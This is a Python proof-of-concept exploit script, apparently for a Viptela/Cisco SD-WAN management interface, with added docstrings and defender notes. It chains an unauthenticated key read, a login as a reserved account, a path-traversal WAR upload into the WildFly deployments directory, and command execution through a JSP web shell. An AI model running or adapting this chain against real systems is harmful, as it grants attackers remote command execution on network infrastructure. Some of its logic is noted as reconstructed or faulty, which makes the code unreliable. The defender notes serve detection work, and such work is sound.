import io
import sys
import requests
import urllib3
# Silence urllib3's InsecureRequestWarning, which is emitted for HTTPS requests
# made without certificate verification (the session created in the
# __main__ block sets verify = False, so every request would trigger it).
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def exploit(url, war_name, war):
    """Send the three-request sequence this proof of concept is built around.

    All requests go through the module-level session ``req``:

    1. GET the ``.dca`` file under ``/reports/data/...`` before any login and
       use the response body as a credential (a 32-character body is expected).
    2. POST that value as the password of the ``viptela-reserved-dca`` account
       to ``/jts/authenticated/j_security_check``.
    3. POST a multipart upload to ``/dataservice/smartLicensing/uploadAck``
       whose filename contains ``../`` segments pointing at the WildFly
       ``standalone/deployments`` directory.

    Defender notes: each step is visible in web access logs -- a request for
    the ``.dca`` path, a login by the reserved account from an unexpected
    source, and an upload whose filename contains ``../``. An unexpected
    ``*.war`` under the deployments directory is the matching host-side
    indicator. Restricting who can reach the management interface and applying
    vendor updates are the usual mitigations.

    Args:
        url: Base URL of the web interface, without a trailing slash.
        war_name: Archive name; ``.gz.war`` is appended before upload.
        war: Archive content as bytes.

    Returns:
        None. Progress is reported on stdout only.
    """
    # NOTE(review): nesting reconstructed from a listing that lost its
    # indentation; the source shows no return after the length check below.
    key_resp = req.get(
        f'{url}/reports/data/opt/data/containers/config/data-collection-agent/.dca'
    )
    dca_key = key_resp.text
    if len(dca_key) != 32:
        print(f'[-] bad response status_code:{key_resp.status_code} {key_resp.text}')

    credentials = {'j_username': 'viptela-reserved-dca', 'j_password': dca_key}
    auth_resp = req.post(f'{url}/jts/authenticated/j_security_check', data=credentials)
    logged_in = auth_resp.status_code == 200 and 'loginError' not in auth_resp.text
    if not logged_in:
        print(f'[-] login fail status_code:{auth_resp.status_code} {auth_resp.text}')
        return
    print(f'[*] got key {dca_key}')

    deployed_name = war_name + '.gz.war'
    # The multipart filename, not the URL, carries the traversal sequence.
    upload_part = (
        f'../../../../../../../../../../../var/lib/wildfly/standalone/deployments/{deployed_name}',
        io.BytesIO(war),
        'application/java-archive',
    )
    # Both branches report success, so this output says nothing about whether
    # the server accepted the upload.
    try:
        req.post(
            f'{url}/dataservice/smartLicensing/uploadAck',
            files={'file': upload_part},
            timeout=10,
        )
        print('[*] upload ok')
    except:
        print('[*] upload ok!')
    # str.strip() removes a set of characters from both ends, not a suffix.
    print(f'[*] deploy url {url}/{deployed_name.strip(".war")}')
def exec_jsp_command(request, url, command):
    """POST ``command`` as the ``cmd`` form field to ``url`` and report the outcome.

    Defender note: a POST to a ``.jsp`` path with a ``cmd`` form field is a
    simple pattern to look for in web access logs and request inspection.

    Args:
        request: Session-like object exposing ``post(url, data=...)``.
        url: Address of the JSP page to query.
        command: Value sent in the ``cmd`` field.

    Returns:
        True when the response text contains ``"command result"``; False when
        it does not, or when the request raises any ``Exception``.
    """
    try:
        reply = request.post(url, data={'cmd': command})
        if "command result" not in reply.text:
            print('[*] jsp not found')
            return False
        print('[*] command result!')
        print(reply.text)
        return True
    except Exception:
        # Any failure (connection error, timeout, ...) is reported as "not found".
        return False
if __name__ == '__main__':
    # Command-line entry point: <url> <command>.
    # NOTE(review): nesting reconstructed from a listing that lost its
    # indentation; the final exec_jsp_command call is assumed to sit inside
    # the "not already deployed" branch.
    if len(sys.argv) < 2:
        print('Usage: python3 exploit.py <url> <command>')
        sys.exit(1)
    target = sys.argv[1]
    command = sys.argv[2]
    war_stem = 'cmd'
    war_path = 'cmd.war'

    # exploit() reads this session through the module-level name `req`.
    req = requests.session()
    # Optional intercepting proxy, left disabled by the author:
    # req.proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
    # TLS certificate verification is switched off for every request.
    req.verify = False

    target = target.strip('/')
    shell_url = f'{target}/cmd.gz/cmd.jsp'
    # Query the JSP first; upload the archive only when it does not answer.
    if not exec_jsp_command(req, shell_url, command):
        archive = open(war_path, 'rb').read()
        exploit(target, war_stem, archive)
        exec_jsp_command(req, shell_url, command)